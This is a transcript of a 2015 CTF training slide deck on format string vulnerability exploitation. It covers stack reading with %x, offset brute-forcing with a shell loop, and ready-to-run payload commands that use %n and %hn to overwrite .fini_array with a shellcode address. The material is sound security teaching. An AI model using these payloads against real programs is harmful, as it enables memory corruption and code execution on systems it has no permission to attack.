Upgrade to Pro — share decks privately, control downloads, hide ads and more …

String format exploitation in 15"

String format exploitation in 15"

Short course I gave about format string vulnerabilities exploitation. Mostly for wargames/CTF.

Source code can be found at:
* https://github.com/milkmix-/training/tree/master/strfmt

Julien Bachmann

January 22, 2015
Tweet

More Decks by Julien Bachmann

Other Decks in Technology

Transcript

  1. Exploiting format string in 15’’
    CTF training session
    Julien Bachmann / @milkmix_

    View full-size slide

  2. intro | source?
    Coming from variadic functions
    va_arg
    printf
    Missing format string
    When user can specify is format string

    View full-size slide

  3. intro | consequence?
    Two possibilities
    display process memory
    modify process memory :)

    View full-size slide

  4. intro | man 3 printf
    printf(“hex value: %x”, 42);
    int i;
    printf(“number of bytes so far%n”, &i);
    printf(“%2$s %1$s\n”, “world”, “Hello”);

    View full-size slide

  5. read | detail
    printf(buf);
    printf(“%x”);
    0x42424242
    0x41414141
    buf
    @ret
    %ebp
    local

    View full-size slide

  6. read | detail
    printf(buf);
    printf(“%2$x”);
    0x42424242
    0x41414141
    buf
    @ret
    %ebp
    local

    View full-size slide

  7. read | find our buffer
    It is in the stack
    need to find the virtual argument to printf
    brute force it!
    possibly need to add [1-3] padding bytes to align on 4 bytes

    View full-size slide

  8. read | our target

    View full-size slide

  9. read | find our buffer
    for offset in `seq 0 20`; do echo "offset=$offset"; ./strfmt "AAAA%$offset\$x";
    echo; done | grep 4141 -B1

    View full-size slide

  10. write | specific address
    Put it in our buffer
    Use %n to write intead of %x to read
    Check the system endianness

    View full-size slide

  11. write | specific address
    ./strfmt `python -c 'print "B\x42\x42\x42\x42%6$n"'`

    View full-size slide

  12. write | specific address

    View full-size slide

  13. write | specific address
    What to overwrite?
    interesting variable
    GOT
    .dtor
    .fini_array
    checksec to validate writable zones

    View full-size slide

  14. write | specific address

    View full-size slide

  15. write | specific address
    How to write
    Endianness again ;)
    Not possible to write 0xffffdee8 (shellcode address in environment) in one pass
    Split in two
    0xdee8
    0xffff - 0xdee8
    Use %hn to write only a word and not rewrite first part

    View full-size slide

  16. write | specific address
    EGG=`python -c 'print "\x90"*100+""'` ./strfmt `python -c 'print "B
    \x68\x96\x04\x08\x6a\x96\x04\x08%57055c%6$hn%8471c%7$hn"'`
    @<.fini_array>
    @<.fini_array> + 2
    0xdee8 - 9
    0xffff - 0xdee8

    View full-size slide

  17. auto | libformatstr
    From hellman
    Brute force and format automatic generation :)

    View full-size slide